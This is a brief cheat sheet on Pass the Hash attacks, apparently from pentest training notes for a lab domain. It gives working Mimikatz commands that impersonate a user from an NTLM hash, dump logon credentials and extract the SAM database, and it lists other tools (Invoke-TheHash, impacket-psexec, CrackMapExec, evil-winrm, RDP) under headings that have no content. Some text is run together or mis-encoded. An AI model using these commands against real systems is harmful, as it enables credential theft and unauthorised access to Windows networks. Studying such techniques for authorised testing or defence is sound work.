Pass the Hash (PtH) Attack
Performing Pass the Hash Attacks
1. Mimikatz (Windows)
Mimikatz Pass the Hash Command:
mimikatz.exe privilege::debug sekurlsa::pth /user:david /domain:inlanefreight.htb /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /run:cmd.exe exitMimikatz Extract Hashes Command
mimikatz.exe privilege::debug sekurlsa::logonpasswordsmimikatz.exe privilege::debug token::elevate lsadump::sam2. Invoke-TheHash (Windows)
Using SMB Execution:
Reverse Shell via WMI:

3. Impacket-psexec (Linux)
4. CrackMapExec (Linux)
5. evil-winrm (Linux)
6. Pass the Hash via RDP (Linux)
Requirements:

β οΈ UAC Limitations for Local Accounts
Last updated